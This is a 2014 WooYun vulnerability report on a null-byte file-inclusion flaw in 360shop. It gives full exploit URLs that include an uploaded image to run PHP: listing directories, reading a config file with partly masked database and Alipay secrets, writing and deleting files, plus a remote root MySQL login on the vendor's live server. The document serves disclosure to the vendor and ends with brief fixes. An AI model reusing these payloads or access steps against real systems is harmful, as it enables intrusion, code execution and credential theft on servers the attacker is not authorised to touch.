当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-048045

漏洞标题:360shop文件包含漏洞发生的一场血案可导致服务器沦陷

相关厂商:杭州启博科技

漏洞作者: 秋风

提交时间:2014-01-06 17:04

修复时间:2014-01-11 17:05

公开时间:2014-01-11 17:05

漏洞类型:文件包含

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-01-06: 细节已通知厂商并且等待厂商处理中
2014-01-11: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

0#文件包含漏洞(空字符注入类型)常规打法一般都是包含各类log文件。这次利用时发现找不到一个有用的log文件。。。。。。于是乎放了几天,没继续测了!
1#一晚做梦时,梦到我用PHP include了一个用户头像,哇咔咔,醒来后果断寻找有图片上传的地方。到前台注册用户后,发现尼玛没有一个可以上传图片的地方!去后台瞅瞅?俺就不信后台没提供上传图片。。。

详细说明:

#0信息收集
www.qiboot.com
www.360shop.com.cn
这俩域名所属同一ip,暂且猜测服务脚本也在同一台机器上!

qiufeng@ubuntu:/tmp$ ping www.qiboot.com
PING www.qiboot.com (202.75.216.198) 56(84) bytes of data.
64 bytes from 202.75.216.198: icmp_req=1 ttl=50 time=8.17 ms
...
qiufeng@ubuntu:/tmp$ ping www.360shop.com.cn
PING www.360shop.com.cn (202.75.216.198) 56(84) bytes of data.
64 bytes from 202.75.216.198: icmp_req=1 ttl=50 time=12.9 ms
...


泄露绝对路径

Warning: preg_match() [function.preg-match]: Unknown modifier '.' in /bootqi/apache2/htdocs/vhost/company/qiboot/header.php on line 98


.png


泄露用户名密码(进后台主要为了上传带特定码的图片,为后面攻击做铺垫)

http://www.qiboot.com/admin/login.php
username: demohu@gmail.com
password: 43******31


弱密码。。。。是病,得治!

.png


可控图片相对路径(1388986954为动态,上传图片后可获得)
http://www.qiboot.comhttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/linkimg/1388986954.jpg
得到相对路径"upload/linkimg/1388986954.jpg"

.png


#0拿泄露的绝对路径信息进行猜测得图片绝对路径如下:
/bootqi/apache2/htdocs/vhost/company/qiboothttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/linkimg/1388986954.jpg
访问该地址,有乱码数据返回则正常

http://www.qiboot.com/?mod=product&do=../../../../../../../../../../bootqi/apache2/htdocs/vhost/company/qiboothttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/linkimg/1388986954.jpg%00


.png


#1打印目录及文件,可修改参数d的值扫描整站

www.qiboot.com/?mod=product&do=../../../../../../../../bootqi/apache2/htdocs/vhost/company/qiboothttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/linkimg/1388986954.jpg%00&wooyun=print_r(@scandir($_GET[d]));&d=/bootqi/apache2/htdocs/vhost/company
>>/bootqi/apache2/htdocs/vhost/company目录文件打印结果
Array
(
    [0] => .
    [1] => ..
    [2] => crm
    [3] => fushi
    [4] => help
    [5] => help_hicloud
    [6] => help_hicloud.zip
    [7] => help_tltw
    [8] => help_tltw.zip
    [9] => hotel
    [10] => lyf
    [11] => newcom
    [12] => newcom20130326.zip
    [13] => newshop
    [14] => qiboot
    [15] => zuanshi
)
下面这个目测是给客户部署的服务
http://www.qiboot.com/?mod=product&do=../../../../../../../../bootqi/apache2/htdocs/vhost/company/qiboothttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/linkimg/1388986954.jpg%00&wooyun=print_r(@scandir($_GET[d]));&d=/bootqi/apache2/htdocs/vhost/vhostsite
>>/bootqi/apache2/htdocs/vhost/vhostsite目录文件打印结果
Array
(
    [0] => .
    [1] => ..
    [2] => 171688.cn
    [3] => badbuildfs
    [4] => bugfree
    [5] => company
    [6] => domain
    [7] => faq
    [8] => grep.txt
    [9] => helpcenter
    [10] => hotel_
    [11] => kehu
    [12] => lyf
    [13] => netdesk
    [14] => newcom
    [15] => newcom__2012-02
    [16] => pagenotfind
    [17] => qcom
    [18] => qiboot
    [19] => taodiantong
    [20] => wddl.cn
    [21] => zjtggroup
    [22] => zjtggroup_20120619
    [23] => zjtggroup_temp
)


#2查看文件,可修改参数d的值查看整站文件

www.qiboot.com/?mod=product&do=../../../../../../../../bootqi/apache2/htdocs/vhost/company/qiboothttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/linkimg/1388986954.jpg%00&wooyun=print_r(@file_get_contents($_GET[d]));&d=/bootqi/apache2/htdocs/vhost/company/newshop/conf/config.php
获取文件信息如下:
<?php
if ( !defined('IN_EB') )
{
	die("Hacking attempt");
}
if (PHP_OS == 'WINNT')
{
	/**
	 * 数据库主机
	 */
	$dbhost = 'localhost';
	$dbport = '3306';
	$dbuser = "root";
	$dbpass = "";
	$dbname = "360_newshop";
	$table_prefix = "eb_";
	$dbtype = "mysql4";
	$acm_type = 'file';
	
	
	/**
	 * 远程配置
	 */
	$az_prefix = 'eb';
	$az_dbhost = 'localhost';
	$az_dbuser = 'root';
	$az_dbpass = '';
	$az_dbname = 'abc_appaz';
	#$az_install = 'http://appaz.test.com/install.php';
	#$az_domain = 'http://appaz.test.com';
	$az_install = 'http://qudao.v2.taodiantong.cn/install.php';
	$az_domain = 'http://qudao.v2.taodiantong.cn/install.php';
}
else
{
	
	/**
	 * 数据库主机
	 */
	$dbhost = 'localhost';
	$dbport = '3306';
	$dbuser = "root";
	$dbpass = "qi************hop";
	$dbname = "360_ncom";
	$table_prefix = "eb_";
	$dbtype = "mysql4";
	$acm_type = 'file';
	
	
	/**
	 * 远程配置
	 */
	$az_prefix = 'eb';
	$az_dbhost = '122.224.72.216';
	$az_dbuser = 'az*****ll';
	$az_dbpass = 'az2**********c871K';
	$az_dbname = 'abc_appaz';
	#$az_install = 'http://qudao.taodiantong.cn/install.php';
	$az_install = 'http://qudao.v2.taodiantong.cn/install.php';
	$az_domain = 'http://fuwu.taodiantong.cn';
	
	
}
$pay_config = array(
'alipay_key' 	=> 'zrbh**********16alsto5',
'alipay_partner'=> '2088*******250',
'alipay_account'=> 'alipay@360eb.com'
);
?>


2.png


#3写入传说中的webshell,参数d为内容,n为文件名

利用:
www.qiboot.com/?mod=product&do=../../../../../../../../bootqi/apache2/htdocs/vhost/company/qiboothttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/linkimg/1388986954.jpg%00&wooyun=file_put_contents(@$_GET[n],@$_GET[d]);&d=by:wooyun.org&n=/bootqi/apache2/htdocs/vhost/company/newshop/wooyun.org.php
对应文件地址:
http://www.360shop.com.cn/wooyun.org.txt


webshell.png


#4删除文件,参数n为文件名

www.qiboot.com/?mod=product&do=../../../../../../../../bootqi/apache2/htdocs/vhost/company/qiboothttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/linkimg/1388986954.jpg%00&wooyun=unlink(@$_GET[n]);&n=/bootqi/apache2/htdocs/vhost/company/newshop/wooyun.org.txt


测试下#2所泄露的mysql用户root能否登陆,不测本地,测远程!发现居然没禁止远程登陆。。。。。。坚决不脫裤子!

qiufeng@ubuntu:/tmp$ nmap 202.75.216.198 -p 3306
Starting Nmap 6.00 ( http://nmap.org ) at 2014-01-06 15:02 CST
Nmap scan report for 202.75.216.198
Host is up (0.0081s latency).
PORT     STATE SERVICE
3306/tcp open  mysql
Nmap done: 1 IP address (1 host up) scanned in 0.14 seconds
qiufeng@ubuntu:/tmp$ mysql -h 202.75.216.198 -uroot -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 1218931
Server version: 5.0.95 Source distribution
Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
+------------------------------+
| Database                     |
+------------------------------+
| information_schema           |
| 360_89lou                    |
| 360_89lou_0818               |
| 360_canglong                 |
| 360_canglong_0927            |
| 360_canglong_1104            |
| 360_canglong_1112            |
| 360_crm                      |
| 360_help                     |
| 360_help_hicloud             |
| 360_help_tltw                |
| 360_hotel                    |
| 360_ncom                     |
| 360_newshop                  |
| 360_qiboot                   |
| 360_tcrm                     |
| 360_www_bandao_com           |
| 3800_www_tomatoc_com         |
| 51_ml                        |
| 8800_www_mylianmei_com       |
| 8800_www_onespacetwofoot_com |
| 8800_www_yibuerzu_com        |
| a_men_discuz                 |
| a_myzs                       |
| a_myzs_20120401              |
| a_sanude                     |
| a_skpifa_wordpress           |
| a_tltest                     |
| abc_appaz                    |
| abc_appaz_0613               |
| abc_appaz_20111031           |
| abc_appaz_fx                 |
| abc_lsa                      |
| abc_taodiantong              |
| ali_glsp8_com                |
| ali_goucoo_com               |
| ali_shuinianhua_com          |
| aliefday_360shop_cc          |
| alihanxianzi_360shop_cc      |
| alilgg360_360shop_cc         |
| app_01008034                 |
| app_02263                    |
| app_02632                    |
| app_02633                    |
| app_02634                    |
| app_02635                    |
| app_0618                     |
| app_1301                     |
| app_1307525362               |
| app_2370                     |
| app_2371                     |
| app_2447                     |
| app_2449                     |
| app_3803                     |
| app_4370                     |
| app_5163                     |
| app_6395                     |
| app_7287                     |
| app_8298                     |
| app_9954                     |
| app_9954_20120829            |
| badbuildfs                   |
| bugfree2                     |
| bz_meimeivip_com             |
| bzelf520_360shop_cc          |
| bzmagic_szjieli_com          |
| bzmimidf_360shop_cc          |
| daohang_171688_cn            |
| daohang_wddl_cn              |
| mysql                        |
| netdesk                      |
| son1308030959                |
| son1318995965                |
| son2633                      |
| son2634                      |
| son2638                      |
| v2_lovelens_com              |
| v2_mingdi_net                |
| v2powerfeel_360shop_cc       |
| v2soso2099_360shop_cc        |
| v2xinyi521_360shop_cc        |
| www_myvip8_com               |
| www_yibuerzu_com             |
| zjtggroup                    |
| zjtggroup_0619               |
+------------------------------+
85 rows in set (0.01 sec)


被偷梁换柱的图片文件绝对地址:/bootqi/apache2/htdocs/vhost/company/qiboothttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/linkimg/1388986954.jpg
请厂商自行删除||替换
声明:测试所写入的文件本人已删除,建议扫描一下整站。

漏洞证明:

webshell.png

修复方案:

1.过滤
2.mysql建议只对内网开放
3.全站审查

版权声明:转载请注明来源 秋风@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-01-11 17:05

厂商回复:

漏洞Rank:20 (WooYun评价)

最新状态:

2014-01-13:谢谢,马上就治!

漏洞评价:

评论

  1. 2014-01-06 17:29 | Sct7p ( 实习白帽子 | Rank:62 漏洞数:9 | 懂与不懂之间只隔了一层纸,懂的人会觉得很...)

    梦到我用PHP include了一个用户头像,然后截断了一下。包含了个图片。。然后就xxoo了。然后管理员上线日志一查。原来又是你。就等你来了

  2. 2014-01-06 20:29 | 巫妖 ( 实习白帽子 | Rank:38 漏洞数:5 | 腚大屁股圆,家里一定很有钱)

    mark

  3. 2014-01-11 20:31 | 4399gdww ( 路人 | Rank:20 漏洞数:4 | )

    忽略?这.....得治

  4. 2014-01-13 10:54 | 秋风 ( 普通白帽子 | Rank:438 漏洞数:44 | 码农一枚,关注互联网安全)

    @xsser @疯狗求补分。。。。。

  5. 2014-01-13 11:20 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @杭州启博科技 5天时间啊。。。